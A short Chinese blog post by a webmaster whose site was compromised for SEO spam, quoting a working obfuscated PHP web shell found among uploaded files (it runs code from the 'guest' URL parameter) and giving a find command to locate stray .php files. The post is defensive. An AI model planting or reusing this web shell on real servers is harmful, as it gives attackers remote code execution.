有很多网站被黑,导致网站关键词 网站标题 被修改,更可恶的是你如果发现的晚,关键词都被收录进去了,搞得很麻烦。
这是被上传的php文件之一,
<?php $poc ="axsxsxexrxt";$poc_1 = explode("x", $poc); $poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3]. $poc_1[4]. $poc_1[5];$poc_2(urldecode(urldecode(urldecode($_REQUEST['guest']))));?>
这串代码,只要在url参数中输入 任意转码之后的代码 都可以执行,如 域名/config.cache.php?guest=echo ‘hi’;
如果你网站没有把静态资源做到静态云存储里面去,那么你的麻烦可大了…
如果你网站中存放静态资源的目录里面,文件夹繁多,那么久难找出这些木马文件,但是有一串代码可以查找出目录下所有的.php文件。
首先 ssh连接服务器,转到root用户,
然后CD到项目目录
cd /www/wwwroot/xxx/public
再查找
find . -type f -regex ".*\.php"
结果如下
最好你最好检查下网站是否有上传漏洞之类的…
其它的措施不清楚,第一次被搞,然后不需要的端口关闭掉,如果有好的办法请告知我,,我自己的博客最近存在这样的问题,也不知道是不是上述方法,能够彻底的防范,诸位大神如果有办法,请务必留言我,让我整一整…